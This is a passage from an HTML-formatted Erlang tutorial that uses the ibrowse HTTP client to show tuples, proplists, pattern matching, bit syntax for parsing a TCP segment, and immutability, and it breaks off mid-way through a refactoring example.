&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ git clone git@github.com:unbalancedparentheses&#x2F;erlskeletor_cowboy.git&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ cd erlskeletor_cowboy&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ make&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Make will fetch all the dependencies and compile the project. Up to now we executed erl to launch the Erlang shell. Now we are going to use:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ make shell&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Make shell will start Erlang and all the dependencies we need. You will see a lot of output. Now we can return to our work:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;1&amp;gt; ibrowse:send_req(&amp;quot;http:&#x2F;&#x2F;www.google.com&#x2F;&amp;quot;, [], get).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{ok,&amp;quot;302&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[{&amp;quot;Cache-Control&amp;quot;,&amp;quot;private&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Type&amp;quot;,&amp;quot;text&#x2F;html; charset=UTF-8&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Location&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;?gfe_rd=cr&amp;amp;ei=Nk11U4zsFIeF8Qf6hoC4BA&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Length&amp;quot;,&amp;quot;263&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Date&amp;quot;,&amp;quot;Thu, 15 May 2014 23:26:46 GMT&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Server&amp;quot;,&amp;quot;GFE&#x2F;2.0&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Alternate-Protocol&amp;quot;,&amp;quot;443:quic&amp;quot;}],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;meta http-equiv=\&amp;quot;content-type\&amp;quot; content=\&amp;quot;text&#x2F;html;charset=utf-8\&amp;quot;&amp;gt;\n&amp;lt;TITLE&amp;gt;302 Moved&amp;lt;&#x2F;TITLE&amp;gt;&amp;lt;&#x2F;HEAD&amp;gt;&amp;lt;BODY&amp;gt;\n&amp;lt;H1&amp;gt;302 Moved&amp;lt;&#x2F;H1&amp;gt;\nThe document has moved\n&amp;lt;A HREF=\&amp;quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;?gfe_rd=cr&amp;amp;amp;ei=Nk11U4zsFIeF8Qf6hoC4BA\&amp;quot;&amp;gt;here&amp;lt;&#x2F;A&amp;gt;.\r\n&amp;lt;&#x2F;BODY&amp;gt;&amp;lt;&#x2F;HTML&amp;gt;\r\n&amp;quot;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We call the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;cmullaparthi&#x2F;ibrowse&#x2F;blob&#x2F;master&#x2F;src&#x2F;ibrowse.erl#L-165&quot;&gt;send_req&lt;&#x2F;a&gt; function from the module &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;cmullaparthi&#x2F;ibrowse&quot;&gt;ibrowse&lt;&#x2F;a&gt;, an Erlang HTTP client. The first argument is a string with the URL. Strings are a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.erlang.org&#x2F;faq&#x2F;academic.html#id58248&quot;&gt;linked list of integers&lt;&#x2F;a&gt;, since Erlang doesn’t have a real string type. It is not very common to use strings in Erlang. You have &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Symbol_%28programming%29&quot;&gt;atoms&lt;&#x2F;a&gt; (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.reactive.io&#x2F;tips&#x2F;2009&#x2F;01&#x2F;11&#x2F;the-difference-between-ruby-symbols-and-strings&#x2F;&quot;&gt;Ruby&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stackoverflow.com&#x2F;questions&#x2F;8846628&#x2F;what-exactly-is-a-symbol-in-lisp-scheme&quot;&gt;Lisp&lt;&#x2F;a&gt; symbols), binaries and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;prog21.dadgum.com&#x2F;70.html&quot;&gt;IOLists&lt;&#x2F;a&gt;. Atoms and binaries are really common and handy. For the moment this is not important, but I wanted to mention it so that it does not confuse you later.&lt;&#x2F;p&gt;
&lt;p&gt;The second argument of the call to send_req is a list of headers we want to send with the request; we are not sending any headers in this case. Finally, with the third argument, we specify the verb of the request. We used the atom &lt;em&gt;get&lt;&#x2F;em&gt; for that. Variables cannot begin with a lowercase letter because atoms do: atoms start with a lowercase letter or are enclosed in single quotes. As you can see, we sent a get request to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.google.com&#x2F;&quot;&gt;http:&#x2F;&#x2F;www.google.com&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s inspect the result of the call:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{ok,&amp;quot;302&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[{&amp;quot;Cache-Control&amp;quot;,&amp;quot;private&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Type&amp;quot;,&amp;quot;text&#x2F;html; charset=UTF-8&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Location&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;?gfe_rd=cr&amp;amp;ei=Nk11U4zsFIeF8Qf6hoC4BA&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Length&amp;quot;,&amp;quot;263&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Date&amp;quot;,&amp;quot;Thu, 15 May 2014 23:26:46 GMT&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Server&amp;quot;,&amp;quot;GFE&#x2F;2.0&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Alternate-Protocol&amp;quot;,&amp;quot;443:quic&amp;quot;}],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; &amp;quot;&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;meta http-equiv=\&amp;quot;content-type\&amp;quot; content=\&amp;quot;text&#x2F;html;charset=utf-8\&amp;quot;&amp;gt;\n&amp;lt;TITLE&amp;gt;302 Moved&amp;lt;&#x2F;TITLE&amp;gt;&amp;lt;&#x2F;HEAD&amp;gt;&amp;lt;BODY&amp;gt;\n&amp;lt;H1&amp;gt;302 Moved&amp;lt;&#x2F;H1&amp;gt;\nThe document has moved\n&amp;lt;A HREF=\&amp;quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;?gfe_rd=cr&amp;amp;amp;ei=Nk11U4zsFIeF8Qf6hoC4BA\&amp;quot;&amp;gt;here&amp;lt;&#x2F;A&amp;gt;.\r\n&amp;lt;&#x2F;BODY&amp;gt;&amp;lt;&#x2F;HTML&amp;gt;\r\n&amp;quot;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The result is a tuple with four elements; &lt;strong&gt;{Term1,…,TermN}&lt;&#x2F;strong&gt; denotes a tuple in Erlang. Tuples have a fixed number of terms or elements, and Erlang tuples are very similar to Python tuples. The first element is the atom &lt;strong&gt;ok&lt;&#x2F;strong&gt;, which lets us know that everything went fine. The second element is the string “302”; the 302 Found HTTP status code is usually used to redirect the user somewhere else. The third element of the result is the list of headers that google sent us in the answer.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[{&amp;quot;Cache-Control&amp;quot;,&amp;quot;private&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Type&amp;quot;,&amp;quot;text&#x2F;html; charset=UTF-8&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Location&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;?gfe_rd=cr&amp;amp;ei=Nk11U4zsFIeF8Qf6hoC4BA&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Length&amp;quot;,&amp;quot;263&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Date&amp;quot;,&amp;quot;Thu, 15 May 2014 23:26:46 GMT&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Server&amp;quot;,&amp;quot;GFE&#x2F;2.0&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Alternate-Protocol&amp;quot;,&amp;quot;443:quic&amp;quot;}]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As you can see the headers are represented as a list of tuples. Each tuple has two elements: a key and a value. This is a type of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.erlang.org&#x2F;doc&#x2F;man&#x2F;proplists.html&quot;&gt;proplist&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The first header has a key of type string “Cache-Control” with a string value “private”. Also check that the “Location” key has the URL value of the redirect where google wants us to go. I know it can be different from what you are used to, but it is not that difficult to understand. After a few hours of reading proplists, tuples or lists in Erlang it will feel very natural.&lt;&#x2F;p&gt;
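&lt;p&gt;Once the headers proplist is bound to a variable (we will bind Headers in a moment), looking up a single value is one call to the standard proplists module. A minimal sketch:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% returns the value for the given key, or undefined&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proplists:get_value(&amp;quot;Content-Type&amp;quot;, Headers).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% &amp;quot;text&#x2F;html; charset=UTF-8&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;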
&lt;p&gt;The last element of the answer to the call to ibrowse:send_req is a big string with the HTML that google sent us:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;meta http-equiv=\&amp;quot;content-type\&amp;quot; content=\&amp;quot;text&#x2F;html;charset=utf-8\&amp;quot;&amp;gt;\n&amp;lt;TITLE&amp;gt;302 Moved&amp;lt;&#x2F;TITLE&amp;gt;&amp;lt;&#x2F;HEAD&amp;gt;&amp;lt;BODY&amp;gt;\n&amp;lt;H1&amp;gt;302 Moved&amp;lt;&#x2F;H1&amp;gt;\nThe document has moved\n&amp;lt;A HREF=\&amp;quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;?gfe_rd=cr&amp;amp;amp;ei=Nk11U4zsFIeF8Qf6hoC4BA\&amp;quot;&amp;gt;here&amp;lt;&#x2F;A&amp;gt;.\r\n&amp;lt;&#x2F;BODY&amp;gt;&amp;lt;&#x2F;HTML&amp;gt;\r\n&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now let’s store the result:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;2&amp;gt; {ok, &amp;quot;302&amp;quot;, Headers, Body} = ibrowse:send_req(&amp;quot;http:&#x2F;&#x2F;www.google.com&#x2F;&amp;quot;, [], get).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-9mLW7UAh0eDj2ljx5GfCJw.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;Pattern, pattern, pattern matching everything!!!&lt;&#x2F;p&gt;
&lt;p&gt;We sent a get request to google and got an answer. &lt;em&gt;ok&lt;&#x2F;em&gt; is an atom, and &lt;em&gt;“302”&lt;&#x2F;em&gt; is a string. They are not assigned, since they are not variables. So why did we use the equal sign with them? Because in Erlang the equal sign is not exactly an assignment. Since Erlang supports pattern matching, the equal sign is a match operator: it tries to find equivalence between the two sides, and then binds values to unbound variables, thus assigning them a value.&lt;&#x2F;p&gt;
&lt;p&gt;So, after getting the result of our call to ibrowse:send_req, Erlang asserts that we got a four-element tuple that starts with the atom ok and the string “302”. Then, since it knows that Headers and Body are unbound, it assigns the headers proplist to the variable Headers and the HTML returned by Google to the variable Body.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;3&amp;gt; Headers.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[{&amp;quot;Cache-Control&amp;quot;,&amp;quot;private&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Type&amp;quot;,&amp;quot;text&#x2F;html; charset=UTF-8&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Location&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;?gfe_rd=cr&amp;amp;ei=Nk11U4zsFIeF8Qf6hoC4BA&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Content-Length&amp;quot;,&amp;quot;263&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Date&amp;quot;,&amp;quot;Thu, 15 May 2014 23:26:46 GMT&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Server&amp;quot;,&amp;quot;GFE&#x2F;2.0&amp;quot;},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&amp;quot;Alternate-Protocol&amp;quot;,&amp;quot;443:quic&amp;quot;}]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To sum up, pattern matching is way more than another syntax for the C switch or the if&#x2F;elif&#x2F;else of Python and most languages. With pattern matching you get normal branching, conditionals on complex structures (not only comparisons of simple values), and you can also extract specific values while you do the comparison and&#x2F;or assignment. You &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;deliberate-software.com&#x2F;function-pattern-matching&#x2F;&quot;&gt;make the compiler work for you&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
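&lt;p&gt;For example, here is a small sketch (a made-up helper, not part of ibrowse) that branches on the shape of a send_req result and extracts the interesting values in the function head at the same time:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% match the four-element success tuple and pull out two fields,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% or match the error tuple; no if or case needed&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;describe({ok, Status, _Headers, Body}) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  {Status, length(Body)};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;describe({error, Reason}) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  {failed, Reason}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;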
&lt;p&gt;Finally, I wanted to show a beautiful example of pattern matching where we dissect a TCP segment by its bits:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;&amp;lt;SourcePort:16, DestinationPort:16,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; SequenceNumber:32,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; AckNumber:32,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; DataOffset:4, _Reserved:4, Flags:8, WindowSize:16,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; Checksum:16, UrgentPointer:16,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; Payload&#x2F;binary&amp;gt;&amp;gt; = TcpSegment.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Ain’t this a good example of Erlang expressiveness?&lt;&#x2F;p&gt;
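&lt;p&gt;The same bit syntax also works in the other direction, for building binaries. Here is a minimal sketch with made-up field values, constructing a fake segment and immediately taking it apart again:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% build a fake segment: source port 80, destination port 443&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;TcpSegment = &amp;lt;&amp;lt;80:16, 443:16, 1:32, 0:32,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               5:4, 0:4, 2:8, 65535:16, 0:16, 0:16,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               &amp;quot;hi&amp;quot;&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% skip the remaining 128 header bits and grab the payload&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;&amp;lt;SourcePort:16, DestinationPort:16, _Rest:128,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Payload&#x2F;binary&amp;gt;&amp;gt; = TcpSegment.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% SourcePort = 80, DestinationPort = 443, Payload = &amp;lt;&amp;lt;&amp;quot;hi&amp;quot;&amp;gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;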
&lt;h4 id=&quot;god-cannot-alter-the-past-though-historians-can-and-some-developers-too-samuel-butler&quot;&gt;God cannot alter the past, though historians can (and some developers too)— Samuel Butler&lt;&#x2F;h4&gt;
&lt;p&gt;Variables are either bound or unbound. As you might know, values are immutable in Erlang, and once a variable is bound you cannot assign a new value to it: only one assignment is allowed. You cannot modify a variable or a value once it has been created.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;4&amp;gt; Message = &amp;quot;Hello ladies!&amp;quot;.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;Hello ladies!&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;5&amp;gt; Message = &amp;quot;Die die my darling&amp;quot;.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;** exception error: no match of right hand side value &amp;quot;Die die my darling&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Immutability and single assignment might seem awkward and uncomfortable at first, but they are very useful properties, since they minimize side effects. While it is not impossible to write Erlang code with race conditions, it is way more difficult than in typical imperative and stateful languages. You will see this in the next section.&lt;&#x2F;p&gt;
&lt;p&gt;A really interesting property, helped by single assignment and immutability, is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Referential_transparency_%28computer_science%29&quot;&gt;referential transparency&lt;&#x2F;a&gt;. In plain English, this means that the result of a function is always the same when you provide the same arguments&#x2F;input. You might think this is a property of most programming languages, but it is not.&lt;&#x2F;p&gt;
&lt;p&gt;The output of calling a method in most object-oriented languages (for example C++, Java or Ruby) depends on the state of the object. Previous calls to other methods change the state that the method you are calling uses, so the result depends not only on the arguments but also on which other methods have been called before. With referential transparency you are on the greener side of the grass, since you have some degree of determinism. Writing test cases is also way easier since, in general, you do not need to mock entire objects or use dependency injection: you just call functions with the arguments you want.&lt;&#x2F;p&gt;
&lt;p&gt;You might think we are using complicated words to show off. But, as you will see in the following posts, thanks to referential transparency and pattern matching we will be able to refactor nested branching implemented with cases into calls to small and simple functions. In many languages, inspired by how Java and C++ implemented OOP, the code is so interdependent that refactoring it is much more difficult.&lt;&#x2F;p&gt;
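&lt;p&gt;As a tiny, made-up preview of that kind of refactoring, a nested case can usually be flattened into function clauses:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% before: branching with a case expression&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;status(Code) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  case Code of&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    200 -&amp;gt; ok;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    404 -&amp;gt; not_found;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _ -&amp;gt; error&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% after: the same logic as three small function clauses&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;status2(200) -&amp;gt; ok;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;status2(404) -&amp;gt; not_found;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
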